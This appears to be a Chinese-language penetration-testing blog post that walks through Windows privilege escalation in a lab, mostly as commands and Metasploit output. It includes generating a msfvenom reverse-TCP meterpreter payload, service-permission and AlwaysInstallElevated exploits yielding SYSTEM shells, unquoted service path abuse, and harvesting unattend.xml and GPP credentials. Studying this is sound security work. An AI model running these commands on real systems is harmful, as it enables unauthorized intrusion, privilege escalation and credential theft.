Lluna's Pure land.

What is life like when singing to wine?

0%

内网渗透测试-权限提升

发表于 更新于 分类于 阅读次数: Valine:
本文字数: 29k 阅读时长 ≈ 26 分钟

0x01.漏洞发现

1.WMIC发现安装补丁

1
wmic qfe get Caption,Description,HotFixID,InstalledOn

2.msf发现安装补丁

首先使用msfvenom生成恶意程序

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=6666 -f exe > shell.exe

启动msf监听

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.4      yes       The listen address (an interface may be specified)
   LPORT     6666             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) >

运行得到shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
msf6 exploit(multi/handler) > use post/windows/gather/enum_patches
msf6 post(windows/gather/enum_patches) > run

[*] Started reverse TCP handler on 192.168.1.4:6666
[*] Sending stage (175174 bytes) to 192.168.1.5
[*] Meterpreter session 5 opened (192.168.1.4:6666 -> 192.168.1.5:49172) at 2021-07-27                                                                                                   04:35:49 -0400

meterpreter >
meterpreter > background
[*] Backgrounding session 5...
msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  5         meterpreter x86/windows  JIYE\Administrator @ WIN7DC1  192.168.1.4:6666 -> 192.168.1.5:49172 (192.168.1.5)

msf6 exploit(multi/handler) >

使用post/windows/gather/enum_patches模块快速扫描缺失的补丁

1
2
3
4
5
6
7
8
9
10
11
12
13
msf6 exploit(multi/handler) > use post/windows/gather/enum_patches
msf6 post(windows/gather/enum_patches) >set session 5
session => 5
msf6 post(windows/gather/enum_patches) > run

[*] Patch list saved to /root/.msf4/loot/20210727044047_default_192.168.1.5_enum_patches_596648.txt
[+] KB2534111 installed on 7/10/2021
[+] KB2999226 installed on 7/10/2021
[+] KB4474419 installed on 7/10/2021
[+] KB976902 installed on 11/21/2010
[*] Post module execution completed
msf6 post(windows/gather/enum_patches) >

使用post/multi/recon/local_exploit_suggester模块找出可能被利用的漏洞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
msf6 post(windows/gather/enum_patches) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 5
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 192.168.1.5 - Collecting local exploits for x86/windows...
[*] 192.168.1.5 - 38 exploit checks are being tried...
[+] 192.168.1.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 192.168.1.5 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[+] 192.168.1.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 192.168.1.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 192.168.1.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.1.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.1.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[-] 192.168.1.5 - Post interrupted by the console user
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) >

3.Windows Exploit Suggester发现漏洞

首先下载数据库

1
2
3
4
5
6
E:\>python2 windows-exploit-suggester.py --update
[*] initiating winsploit version 3.3...
[+] writing to file 2021-07-27-mssb.xls
[*] done

E:\>

安装xlrd文件

1
pip2 install xlrd==1.2.0

检测

1
E:\>python2 windows-exploit-suggester.py -d 2021-07-27-mssb.xls -i systeminfo.txt > out.txt

查看out.txt文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 4 hotfix(es) against the 386 potential bulletins(s) with a database of 137 known exploits
[*] there are now 386 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 7 SP1 64-bit'
[*] 
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*]   https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
[*]   https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
[*]   https://github.com/tinysec/public/tree/master/CVE-2016-7255
[*] 
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[*]   https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
[*] 
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[*]   https://github.com/foxglovesec/RottenPotato
[*]   https://github.com/Kevin-Robertson/Tater
[*]   https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege
[*]   https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation
[*] 
[E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important
[*]   https://www.exploit-db.com/exploits/39990/ -- Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074), PoC
[*]   https://www.exploit-db.com/exploits/39991/ -- Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074), PoC
[*] 
[E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical
[*]   https://www.exploit-db.com/exploits/39994/ -- Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063), PoC
[*] 
[E] MS16-059: Security Update for Windows Media Center (3150220) - Important
[*]   https://www.exploit-db.com/exploits/39805/ -- Microsoft Windows Media Center - .MCL File Processing Remote Code Execution (MS16-059), PoC
[*] 
[E] MS16-056: Security Update for Windows Journal (3156761) - Critical
[*]   https://www.exploit-db.com/exploits/40881/ -- Microsoft Internet Explorer - jscript9 Java­Script­Stack­Walker Memory Corruption (MS15-056)
[*]   http://blog.skylined.nl/20161206001.html -- MSIE jscript9 Java­Script­Stack­Walker memory corruption
[*] 
[E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile (3143141) - Important
[*]   https://www.exploit-db.com/exploits/40107/ -- MS16-032 Secondary Logon Handle Privilege Escalation, MSF
[*]   https://www.exploit-db.com/exploits/39574/ -- Microsoft Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032), PoC
[*]   https://www.exploit-db.com/exploits/39719/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell), PoC
[*]   https://www.exploit-db.com/exploits/39809/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (C#)
[*] 
[M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important
[*]   https://www.exploit-db.com/exploits/40085/ -- MS16-016 mrxdav.sys WebDav Local Privilege Escalation, MSF
[*]   https://www.exploit-db.com/exploits/39788/ -- Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2), PoC
[*]   https://www.exploit-db.com/exploits/39432/ -- Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1), PoC
[*] 
[E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution (3134228) - Important
[*]   Windows 7 SP1 x86 - Privilege Escalation (MS16-014), https://www.exploit-db.com/exploits/40039/, PoC
[*] 
[E] MS16-007: Security Update for Microsoft Windows to Address Remote Code Execution (3124901) - Important
[*]   https://www.exploit-db.com/exploits/39232/ -- Microsoft Windows devenum.dll!DeviceMoniker::Load() - Heap Corruption Buffer Underflow (MS16-007), PoC
[*]   https://www.exploit-db.com/exploits/39233/ -- Microsoft Office / COM Object DLL Planting with WMALFXGFXDSP.dll (MS-16-007), PoC
[*] 
[E] MS15-134: Security Update for Windows Media Center to Address Remote Code Execution (3108669) - Important
[*]   https://www.exploit-db.com/exploits/38911/ -- Microsoft Windows Media Center Library Parsing RCE Vulnerability aka self-executing' MCL File, PoC
[*]   https://www.exploit-db.com/exploits/38912/ -- Microsoft Windows Media Center Link File Incorrectly Resolved Reference, PoC
[*]   https://www.exploit-db.com/exploits/38918/ -- Microsoft Office / COM Object - 'els.dll' DLL Planting (MS15-134)
[*]   https://code.google.com/p/google-security-research/issues/detail?id=514 -- Microsoft Office / COM Object DLL Planting with els.dll
[*] 
[E] MS15-132: Security Update for Microsoft Windows to Address Remote Code Execution (3116162) - Important
[*]   https://www.exploit-db.com/exploits/38968/ -- Microsoft Office / COM Object DLL Planting with comsvcs.dll Delay Load of mqrt.dll (MS15-132), PoC
[*]   https://www.exploit-db.com/exploits/38918/ -- Microsoft Office / COM Object els.dll DLL Planting (MS15-134), PoC
[*] 
[E] MS15-112: Cumulative Security Update for Internet Explorer (3104517) - Critical
[*]   https://www.exploit-db.com/exploits/39698/ -- Internet Explorer 9/10/11 - CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112)
[*] 
[E] MS15-111: Security Update for Windows Kernel to Address Elevation of Privilege (3096447) - Important
[*]   https://www.exploit-db.com/exploits/38474/ -- Windows 10 Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111), PoC
[*] 
[E] MS15-102: Vulnerabilities in Windows Task Management Could Allow Elevation of Privilege (3089657) - Important
[*]   https://www.exploit-db.com/exploits/38202/ -- Windows CreateObjectTask SettingsSyncDiagnostics Privilege Escalation, PoC
[*]   https://www.exploit-db.com/exploits/38200/ -- Windows Task Scheduler DeleteExpiredTaskAfter File Deletion Privilege Escalation, PoC
[*]   https://www.exploit-db.com/exploits/38201/ -- Windows CreateObjectTask TileUserBroker Privilege Escalation, PoC
[*] 
[M] MS15-100: Vulnerability in Windows Media Center Could Allow Remote Code Execution (3087918) - Important
[*]   https://www.exploit-db.com/exploits/38195/ -- MS15-100 Microsoft Windows Media Center MCL Vulnerability, MSF
[*]   https://www.exploit-db.com/exploits/38151/ -- Windows Media Center - Command Execution (MS15-100), PoC
[*] 
[E] MS15-097: Vulnerabilities in Microsoft Graphics Component Could Allow Remote Code Execution (3089656) - Critical
[*]   https://www.exploit-db.com/exploits/38198/ -- Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation, PoC
[*]   https://www.exploit-db.com/exploits/38199/ -- Windows NtUserGetClipboardAccessToken Token Leak, PoC
[*] 
[M] MS15-078: Vulnerability in Microsoft Font Driver Could Allow Remote Code Execution (3079904) - Critical
[*]   https://www.exploit-db.com/exploits/38222/ -- MS15-078 Microsoft Windows Font Driver Buffer Overflow
[*] 
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[*]   https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC
[*]   https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k Exploit, MSF
[*] 
[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical
[*]   https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows 8.1 - win32k Local Privilege Escalation (MS15-010), PoC
[*]   https://www.exploit-db.com/exploits/37098/ -- Microsoft Windows - Local Privilege Escalation (MS15-010), PoC
[*]   https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows win32k Local Privilege Escalation (MS15-010), PoC
[*] 
[E] MS15-001: Vulnerability in Windows Application Compatibility Cache Could Allow Elevation of Privilege (3023266) - Important
[*]   http://www.exploit-db.com/exploits/35661/ -- Windows 8.1 (32/64 bit) - Privilege Escalation (ahcache.sys/NtApphelpCacheControl), PoC
[*] 
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
[*]   http://www.exploit-db.com/exploits/35474/ -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC
[*] 
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[*]   https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC
[*]   http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC
[*]   http://www.exploit-db.com/exploits/35229/ -- Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1), PoC
[*]   http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF), MSF
[*]   http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF
[*]   http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF
[*] 
[M] MS14-060: Vulnerability in Windows OLE Could Allow Remote Code Execution (3000869) - Important
[*]   http://www.exploit-db.com/exploits/35055/ -- Windows OLE - Remote Code Execution 'Sandworm' Exploit (MS14-060), PoC
[*]   http://www.exploit-db.com/exploits/35020/ -- MS14-060 Microsoft Windows OLE Package Manager Code Execution, MSF
[*] 
[M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical
[*]   http://www.exploit-db.com/exploits/35101/ -- Windows TrackPopupMenu Win32k NULL Pointer Dereference, MSF
[*] 
[E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important
[*]   https://www.exploit-db.com/exploits/39525/ -- Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040), PoC
[*]   https://www.exploit-db.com/exploits/39446/ -- Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040), PoC
[*] 
[E] MS14-035: Cumulative Security Update for Internet Explorer (2969262) - Critical
[E] MS14-029: Security Update for Internet Explorer (2962482) - Critical
[*]   http://www.exploit-db.com/exploits/34458/
[*] 
[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
[*]   http://www.exploit-db.com/exploits/35280/, -- .NET Remoting Services Remote Command Execution, PoC
[*] 
[M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical
[M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M] MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical
[M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical
[M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical
[M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical
[M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*] 
[*] done

4.Sherlock.ps1脚本查看漏洞

首先上传到目标主机

1
2
3
4
meterpreter > upload Sherlock.ps1 C:
[*] uploading  : /root/Sherlock.ps1 -> C:
[*] uploaded   : /root/Sherlock.ps1 -> C:\Sherlock.ps1
meterpreter >

目标主机执行脚本

1
2
PS C:\> Import-Module .\Sherlock
PS C:\> Find-AllVulns > out.txt

查看out.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74

Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable

Title      : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID      : 2013-1300
Link       : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID      : 2013-3881
Link       : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Appears Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable

Title      : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID      : 2015-2426, 2015-2433
Link       : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title      : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID      : 2016-0051
Link       : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Not Supported on single-core systems

Title      : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID      : 2016-0093/94/95/96
Link       : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?
VulnStatus : Appears Vulnerable

Title      : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Appears Vulnerable

Title      : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID      : 2017-7199
Link       : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.html
VulnStatus : Not Vulnerable


0x02.windows系统配置错误利用

1.系统服务权限配置错误

windows server 可创建长久运行的可执行程序,若能获取的修改windows server配置权限, 通过把服务启动的二进制文件替换为恶意二进制文件,可以获得system权限

服务未运行:使用恶意程序替换,然后重启服务
服务正在运行且无法终止:符合绝大多数的漏洞利用场景,使用 DLL劫持技术并尝试重启服务

01.PowerUp.ps1脚本检查服务漏洞

1
2
3
powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('./PowerUp.ps1'); Invoke-AllChecks"

powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"

02.msf的exploit/windows/local/sercice_permissions模块提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
meterpreter > shell
Process 2956 created.
Channel 1 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:\Users\administrator\Desktop>whoami
whoami
jiye\administrator

C:\Users\administrator\Desktop>exit
exit
meterpreter > background 
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/service_permissions 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/service_permissions) >    
msf6 exploit(windows/local/service_permissions) > set session 1
session => 1
msf6 exploit(windows/local/service_permissions) > options 

Module options (exploit/windows/local/service_permissions):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   AGGRESSIVE  false            no        Exploit as many services as possible (dangerous)
   SESSION     1                yes       The session to run this module on.
   TIMEOUT     10               yes       Timeout for WMI command in seconds


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.4      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/local/service_permissions) > run

[*] Started reverse TCP handler on 192.168.1.4:4444 
[-] The registry technique will be skipped because the payload architecture does not match the native system architecture
[*] Trying to add a new service...
[*] Created service... CnoKgsk
[+] Service should be started! Enjoy your new SYSTEM meterpreter session.
[*] Sending stage (175174 bytes) to 192.168.1.5
[*] Meterpreter session 2 opened (192.168.1.4:4444 -> 192.168.1.5:49169) at 2021-07-28 09:16:46 -0400

meterpreter > shell
Process 2832 created.
Channel 2 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

2.注册表键AlwaysInstallElevated提权

原因:开启了windows installer 特权安装功能

cmd输入gpedit.msc——计算机配置——管理模块——windows组件——windows installer

cmd输入gpedit.msc——用户配置——管理模块——windows组件——windows installer

01.powerup利用

1
2
3
4
5
6
7
8
9
powerup下的Get-RegistryAlwaysInstallElevated模块检查注册表键是否被设置
如果被设置则意味MSI文件是以system权限下能运行

# 检查是否被设置
powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('./PowerUp.ps1');Get-RegistryAlwaysInstallElevated
# 运行Write-UserAddMSI模块,生成MSI文件
powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('./PowerUp.ps1');Write-UserAddMSI
# 执行MSI文件
msiexec /quiet /qn /i UserAdd.msi

02.msf的exploit/windows/local/always_install_elevated模块提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
msf6 exploit(windows/local/service_permissions) > use exploit/windows/local/always_install_elevated 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/always_install_elevated) > set session 1
session => 1
msf6 exploit(windows/local/always_install_elevated) > options 

Module options (exploit/windows/local/always_install_elevated):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.4      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf6 exploit(windows/local/always_install_elevated) > run

[*] Started reverse TCP handler on 192.168.1.4:4444 
[*] Sending stage (175174 bytes) to 192.168.1.5
[*] Meterpreter session 3 opened (192.168.1.4:4444 -> 192.168.1.5:49171) at 2021-07-28 09:43:34 -0400

meterpreter > shell
Process 936 created.
Channel 2 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:\Windows\system32>

3.可信任服务路径漏洞

Trusted Service Paths漏洞利用了windows文件路径解析的特性,通俗的说,如果一个服务的可执行文件的路径(带空格)并且没有被双引号引起来,那么这个服务就有漏洞。

例如:有一个文件路径C:\Program Files\Some Folder\Service.exe,操作系统会对文件路径中空格的所有可能情况进行尝试,直至找到一个能够匹配的程序。

本例中会依次尝试执行以下程序:

C:\Program.exe
C:\Program Files\Some.exe
C:\Program Files\Some Folder\Service.exe

如果我们在C盘上传一个名为Program.exe的恶意程序,可能就会以system权限执行该程序,从而达到提权的目的。

01.测试漏洞是否存在

1
2
3
4
5
6
7
8
9
10
11
12
13
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """    #查找没有被引号引起来的服务

icacls "C:\Program Files (x86)"    #检测目标文件夹是否有写权限
Everyone:用户对这个文件夹有完全控制权限。也就是说,所有用户都具有修改这个文件夹的权限
(M):修改
(F):完全控制
(CI):从属容器将继承访问控制项
(OI):从属文件将继承访问控制项
Everyone:(OI)(CI)(F):对该文件夹,用户有读、写、删除、下载其文件、删除其子目录的权限

确认存在此漏洞,把要上传的程序重命令并放置在存在此漏洞且可写的目录下,执行如下命令:
sc stop service_name
sc start service_name

02.msf利用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
msf6 exploit(multi/handler) > use exploit/windows/local/trusted_service_path 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/trusted_service_path) > set session 1
session => 1
msf6 exploit(windows/local/trusted_service_path) > options 

Module options (exploit/windows/local/trusted_service_path):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.4      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf6 exploit(windows/local/trusted_service_path) > run

[-] The Windows::WindowsServices mixin is deprecated, use Windows::Services instead
[*] Started reverse TCP handler on 192.168.1.4:4444 
[*] Finding a vulnerable service...
[-] Exploit failed: NameError undefined local variable or method `service_list' for #<Msf::Modules::Exploit__Windows__Local__Trusted_service_path::Metasploit3:0x00007fca71a280d0>
[*] Exploit completed, but no session was created.

#这里没有利用成功

4.自动安装配置文件

1
dir /b /s c:\Unattend.xml    #搜索Unatted.xml文件

msf查找

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
msf6 > use post/windows/gather/enum_unattend 
msf6 post(windows/gather/enum_unattend) > options 

Module options (post/windows/gather/enum_unattend):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   GETALL   true             yes       Collect all unattend.xml that are found
   SESSION                   yes       The session to run this module on.

msf6 post(windows/gather/enum_unattend) > set session 1
session => 1
msf6 post(windows/gather/enum_unattend) > run

[*] Reading C:\Windows\panther\unattend.xml
[+] Raw version of C:\Windows\panther\unattend.xml saved as: /root/.msf4/loot/20210729010204_default_192.168.1.5_windows.unattend_989482.txt
Unattend Credentials
====================

 Type   Domain  Username        Password  Groups
 ----   ------  --------        --------  ------
 auto           administration
 local          administration

[+] Unattend Credentials saved as: /root/.msf4/loot/20210729010204_default_192.168.1.5_windows.unattend_206680.txt
[*] Post module execution completed
msf6 post(windows/gather/enum_unattend) >

5.查看计划任务

1
schtasks /query /fo LIST /v

AccessChk使用

1
2
3
accesschk.exe /accepteula    #首次使用接受许可,默认弹框
accesschk.exe -dqv "C:\Windows"    #查看目录权限配置
accesschk.exe -uwdqsUsers"AuthenticatedUsers"c:\*.* #列出某个驱动器下所有权限配置有缺陷的文件

0x03.组策略首选项提权

1.获取组策略凭据(SYSVOL/GPP)

01.powershell获取cpassword

1
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('.\Get-GPPPassword.ps1');Get-GPPPassword"

02.msf获取

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
msf6 > use post/windows/gather/credentials/gpp 
msf6 post(windows/gather/credentials/gpp) > options 

Module options (post/windows/gather/credentials/gpp):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   ALL      true             no        Enumerate all domains on network.
   DOMAINS                   no        Enumerate list of space separated domains DOMAINS="dom1 dom2".
   SESSION                   yes       The session to run this module on.
   STORE    true             no        Store the enumerated files in loot.

msf6 post(windows/gather/credentials/gpp) > set session 1
session => 1
msf6 post(windows/gather/credentials/gpp) > run

[*] Checking for group policy history objects...
[-] Error accessing C:\ProgramData\Microsoft\Group Policy\History : stdapi_fs_ls: Operation failed: The system cannot find the path specified.
[*] Checking for SYSVOL locally...
[-] Error accessing C:\Windows\SYSVOL\sysvol : stdapi_fs_ls: Operation failed: The system cannot find the path specified.
[*] Enumerating Domains on the Network...
[*] Retrieved Domain(s) JIYE, WORKGROUP from network
[*] Enumerating domain information from the local registry...
